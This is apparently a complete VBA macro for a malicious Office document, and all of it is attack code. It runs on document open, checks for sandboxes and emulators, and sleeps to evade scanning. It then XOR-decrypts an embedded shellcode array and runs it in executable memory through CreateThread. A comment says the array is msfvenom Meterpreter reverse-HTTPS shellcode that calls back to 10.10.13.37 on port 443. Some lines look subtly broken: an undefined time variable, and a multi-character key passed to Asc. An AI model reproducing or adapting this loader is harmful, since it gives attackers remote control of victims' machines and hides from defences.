Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal lDestination As LongPtr, ByRef sSource As Any, ByVal lLength As Long) As LongPtr
Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal SecurityAttributes As Long, ByVal StackSize As Long, ByVal StartFunction As LongPtr, ThreadParameter As LongPtr, ByVal CreateFlags As Long, ByRef ThreadId As Long) As LongPtr
Private Declare PtrSafe Function Sleep Lib "kernel32" (ByVal mili As Long) As Long
Private Declare PtrSafe Function FlsAlloc Lib "kernel32" (ByVal lpCallback As LongPtr) As Long

Sub Document_Open()
  SCRUN
End Sub

Sub AutoOpen()
  SCRUN
End Sub

Function SCRUN()
  Dim scbuffer As Variant
  Dim tmp As LongPtr
  Dim addr As LongPtr
  Dim counter As Long
  Dim data As Long
  Dim res As Long
  Dim shleep As Integer
  Dim before As Date
  
  ' Check if we're in a sandbox by calling a rare-emulated API
  If IsNull(FlsAlloc(tmp)) Then
    Exit Function
  End If

  ' Sleep to evade in-memory scan + check if the emulator did not fast-forward through the sleep instruction
  shleep = Int((1500 * Rnd) + 2000)
  before = Now()
  Sleep (shleep)
  If DateDiff("s", t, Now()) < shleep Then
    Exit Function
  End If

  ' msfvenom -p windows/meterpreter_reverse_https LHOST=10.10.13.37 LPORT=443 EXITFUNC=thread -f vbapplication --encrypt xor --encrypt-key coldpizza
  scbuffer = Array(159,135,227,100,112,105,26,75,179,234,138,8,239,34,89,241,40,109,232,61,120,107,199,35,92,241,19,75,94,147,85,176,197,70,27,29,97,67,76,165,191,100,123,189,40,22,128,62,239,34,121,45,241,35,95,110,188,239,48,17,255,186,21,47,110,188,52,251,33,98,241,57,67,110,191,225,185,29,70,51,234, _
87,228,109,178,65,150,75,186,205,162,160,97,101,183,81,154,15,149,96,18,148,95,13,77,15,154,57,232,55,72,101,163,15,241,118,42,232,55,112,101,163,226,126,241,96,179,230,40,64,84,50,33,27,56,57,62,147,132,40,54,32,241,115,138,239,147,155,143,52,18,73,83,99,111,4,19,3,91,37,46, _
9,47,24,74,99,249,129,133,170,217,243,110,108,100,89,173,46,42,9,74,239,7,100,143,188,16,112,9,163,199,93,48,24,107,122,123,218,234,137,60,52,32,57,58,42,33,51,7,134,107,175,137,133,175,246,9,127,58,51,24,240,223,14,0,156,186,233,164,4,99,133,52,105,22,131,132,3,112,105,122, _
16,97,9,107,58,51,24,107,163,178,62,156,186,239,156,112,23,76,241,87,9,47,4,100,96,105,122,44,11,99,7,52,192,35,140,133,175,242,48,5,108,50,35,62,18,120,184,171,48,147,177,243,145,122,7,73,59,7,108,36,112,105,16,122,49,11,100,67,107,64,150,175,45,9,22,1,33,5,143,188, _
36,36,158,111,75,99,225,0,150,133,133,136,248,144,147,155,113,170,83,188,20,162,172,215,132,109,67,112,18,199,246,210,241,155,165,85,124,6,107,227,148,140,17,117,210,61,105,19,12,5,108,55,143,188)

  ' XOR-decrypt the shellcode
  For i = 0 To UBound(scbuffer)
    scbuffer(i) = scbuffer(i) Xor Asc("coldpizza")
  Next i

  ' &H3000 = 0x3000 = MEM_COMMIT | MEM_RESERVE
  ' &H40 = 0x40 = PAGE_EXECUTE_READWRITE
  addr = VirtualAlloc(0, UBound(scbuffer), &H3000, &H40)

  For counter = LBound(scbuffer) To UBound(scbuffer)
    data = scbuffer(counter)
    res = RtlMoveMemory(addr + counter, data, 1)
  Next counter

  res = CreateThread(0, 0, addr, 0, 0, 0)
End Function

